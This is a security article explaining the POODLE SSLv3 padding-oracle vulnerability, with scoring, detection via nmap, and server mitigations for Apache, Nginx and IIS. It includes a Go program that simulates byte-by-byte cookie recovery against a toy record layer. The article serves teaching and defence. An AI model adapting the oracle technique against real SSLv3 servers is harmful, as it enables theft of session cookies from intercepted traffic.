POODLE (CVE-2014-3566) stands for Padding Oracle On Downgraded Legacy Encryption.
The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other products, uses nondeterministic CBC padding, which makes it easier for man-in-the-middle attackers to obtain cleartext data via a padding-oracle attack, aka the “POODLE” issue.
Impact
CVSS v2 Base Score: 4.3 (MEDIUM)
Impact Subscore: 2.9
Exploitability Subscore: 8.6
Access Vector: Network exploitable; Victim must voluntarily interact with attack mechanism
Access Complexity: Medium
Authentication: Not required to exploit
Impact Type: Allows unauthorized disclosure of information
At the time of disclosure (October 2014), 97% of SSL web servers were likely to be vulnerable to POODLE. Like Heartbleed, POODLE is an information-disclosure bug rather than a code-execution one: it lets an attacker recover plaintext from an encrypted session.
It relies on web servers and browsers that still allow the old SSL version 3 protocol to secure their communications. SSL 3.0 has long been superseded by Transport Layer Security (TLS), but it is still widely supported on both servers and clients, and is still required for compatibility with Internet Explorer 6. Because browsers retry a failed handshake with older protocol versions, an attacker in the middle can also force a connection that would have used TLS down to SSL 3.0, which is the "downgraded" part of the name.
The flaw is in SSLv3's CBC cipher suites. Unlike TLS 1.0 and newer, SSLv3 does not check the contents of the padding bytes (only the final length byte), and the padding is not covered by the MAC. An attacker who can run JavaScript in the victim's browser, so that it sends many requests whose lengths the attacker controls, and who sits in the path of the connection can use the server's accept/reject behaviour as a padding oracle to decrypt one byte of the encrypted data at a time (on average 256 requests per byte), and so extract secrets such as session cookies byte by byte.
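As an added worked example (not code from the original page, nor from any product named on it), the following Go program simulates the attack described above against a toy SSLv3-style record layer: AES-CBC with an HMAC, a server that accepts a record only if the length byte is in range and the MAC verifies, and a man-in-the-middle who copies the ciphertext block holding one cookie byte over the final padding block and watches whether the server accepts. The keys, the cookie value and the request layout are constructed for the example; the IV is sent with each record rather than chained from the previous record, which does not change the attack. A `strict` flag switches the server to a TLS-style check of every padding byte so the two behaviours can be compared.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/hmac"
	"crypto/rand"
	"crypto/sha256"
	"fmt"
)

const bs = 16 // AES block size

// Keys shared by the simulated browser and server, and the cookie the attacker
// wants to read; all three are constructed values for this example.
var encKey = []byte("0123456789abcdef0123456789abcdef")
var macKey = []byte("constructed-mac-key-for-example!")
var secret = []byte("session=secret-cookie-value")

func mac(data []byte) []byte {
	m := hmac.New(sha256.New, macKey)
	m.Write(data)
	return m.Sum(nil)
}

// encryptRecord builds an SSLv3-style CBC record: plaintext || MAC || padding,
// whose last byte is the padding length. SSLv3 ignores the other padding bytes;
// we fill them with padLen so the same record also passes a TLS-style check.
// Simplification: a random IV is sent per record instead of being chained.
func encryptRecord(plain []byte) []byte {
	rec := append(append([]byte{}, plain...), mac(plain)...)
	padLen := bs - 1 - len(rec)%bs
	rec = append(rec, bytes.Repeat([]byte{byte(padLen)}, padLen+1)...)
	out := make([]byte, bs+len(rec))
	rand.Read(out[:bs]) // the IV is chunk 0 of the record
	blk, _ := aes.NewCipher(encKey)
	cipher.NewCBCEncrypter(blk, out[:bs]).CryptBlocks(out[bs:], rec)
	return out
}

// serverAccepts is the oracle. strict=false is SSLv3: only the length byte is
// checked. strict=true is TLS 1.0+: every padding byte must equal the length byte.
func serverAccepts(rec []byte, strict bool) bool {
	if len(rec) < 2*bs || len(rec)%bs != 0 {
		return false
	}
	blk, _ := aes.NewCipher(encKey)
	pt := make([]byte, len(rec)-bs)
	cipher.NewCBCDecrypter(blk, rec[:bs]).CryptBlocks(pt, rec[bs:])
	padLen := int(pt[len(pt)-1])
	if padLen > bs-1 || len(pt) < padLen+1+sha256.Size {
		return false
	}
	if strict && !bytes.Equal(pt[len(pt)-1-padLen:], bytes.Repeat([]byte{byte(padLen)}, padLen+1)) {
		return false
	}
	pt = pt[:len(pt)-1-padLen]
	return hmac.Equal(pt[len(pt)-sha256.Size:], mac(pt[:len(pt)-sha256.Size]))
}

// victimRequest models attacker JavaScript making the browser send a request
// with attacker-chosen filler before and after the cookie.
func victimRequest(prefixLen, suffixLen int) []byte {
	req := append(bytes.Repeat([]byte("A"), prefixLen), secret...)
	return encryptRecord(append(req, bytes.Repeat([]byte("B"), suffixLen)...))
}

// recoverByte recovers secret[j]. Lengths are chosen so secret[j] is the last
// byte of plaintext block t and the record ends with a full padding block. The
// MITM copies ciphertext block t over the padding block; the server accepts only
// when the decrypted length byte is bs-1 (probability 1/256), which leaks
// P_t[15] = (bs-1) XOR C_{t-1}[15] XOR C_{n-1}[15]. Returns the byte, tries used, ok.
func recoverByte(j int, strict bool, maxTries int) (byte, int, bool) {
	prefixLen := bs - 1 - j%bs
	t := (prefixLen + j) / bs
	suffixLen := (bs - (prefixLen+len(secret)+sha256.Size)%bs) % bs
	for try := 1; try <= maxTries; try++ {
		rec := victimRequest(prefixLen, suffixLen)
		n := len(rec)/bs - 1 // chunk index of the padding block (chunk 0 is the IV)
		copy(rec[n*bs:], rec[(t+1)*bs:(t+2)*bs])
		if serverAccepts(rec, strict) {
			return byte(bs-1) ^ rec[t*bs+bs-1] ^ rec[(n-1)*bs+bs-1], try, true
		}
	}
	return 0, maxTries, false // oracle never accepted: padding bytes are checked
}

func main() {
	got, total := []byte{}, 0
	for j := range secret {
		b, tries, _ := recoverByte(j, false, 20000)
		got, total = append(got, b), total+tries
	}
	fmt.Printf("SSLv3 check: recovered %q in %d requests\n", got, total)
	_, tries, ok := recoverByte(0, true, 5000)
	fmt.Printf("TLS-style check: gave up after %d requests (ok=%v)\n", tries, ok)
}
```

Running it prints the recovered cookie and the number of forced requests, typically around 256 per byte. With the TLS-style padding check the copied block is rejected every time, because its decrypted padding bytes are random garbage rather than copies of the length byte, which is why TLS 1.0 and later are not open to this particular trick.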
Nmap
Your servers are vulnerable if they support SSLv3 with any CBC cipher suite; in practice, treat any SSLv3 support as a finding. Several options here:
nmap -p 443 --script ssl-enum-ciphers <target host>
Look for an SSLv3 section in the output listing CBC ciphers. Newer nmap releases also ship a dedicated ssl-poodle script that reports the issue directly.
Acunetix
Online Checker
If you see a poodle in the image below, your browser supports SSLv3 with block (CBC) ciphers and you may be vulnerable. If you see a Springfield Terrier, your browser doesn't support SSLv3, or only supports it with stream ciphers (RC4), which are not affected by this attack.

End-user Protection
- Check to see if SSL 3.0 is disabled on your browser (for example, in Internet Explorer it is under Internet Options, Advanced Settings).
- Prefer HTTPS on the websites you visit, but remember that POODLE attacks HTTPS sessions themselves; disabling SSL 3.0 in the browser is the protection that actually matters.
- Monitor any notices from the vendors you use regarding recommendations to update software or passwords.
- Be wary of phishing emails from attackers asking you to update your password: to avoid landing on an impersonated website, go directly to the official site domain rather than following a link.
Server protection:
The easiest and most robust solution to POODLE is to disable SSLv3 support on your server. If SSLv3 must stay enabled for legacy clients, TLS_FALLBACK_SCSV (supported in OpenSSL 1.0.1j and later) stops downgrade attacks against clients that also implement it, but it does nothing for clients that only speak SSLv3.
Apache
To disable SSLv3 on your Apache server you can configure it using the following, both in the SSL configuration section and in all SSL-enabled virtual hosts explicitly:
SSLProtocol All -SSLv2 -SSLv3
This gives you TLSv1.0, TLSv1.1 and TLSv1.2 (whichever your OpenSSL build supports) and explicitly removes SSLv2 and SSLv3. An SSLProtocol line inside a virtual host overrides the global one, so check every SSL-enabled vhost. Check the config and then restart Apache.
apachectl configtest
sudo service apache2 restart
Nginx
Disabling SSLv3 support on Nginx is just as easy; add this to the http block, or to every server block that terminates TLS:
ssl_protocols TLSv1 TLSv1.1 TLSv1.2;
As with the Apache config above, this gives TLSv1.0+ support and no SSLv2 or SSLv3. A server block with its own ssl_protocols line overrides the http-level setting. Check the config and restart.
sudo nginx -t
sudo service nginx restart
IIS
This involves a registry change and a server reboot. Under the key
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols
create a key named SSL 3.0, under that a key named Server, and inside it a DWORD value named Enabled with the value 0. Setting a DWORD DisabledByDefault to 1 in the same Server key is also common practice. Once that's done, reboot the server for the change to take effect.
Conclusion
Since the disclosure of this bug, systems that support only SSL 3.0 are being abandoned as operators drop server-side support for the outdated protocol, and major browsers have since removed SSL 3.0 support entirely.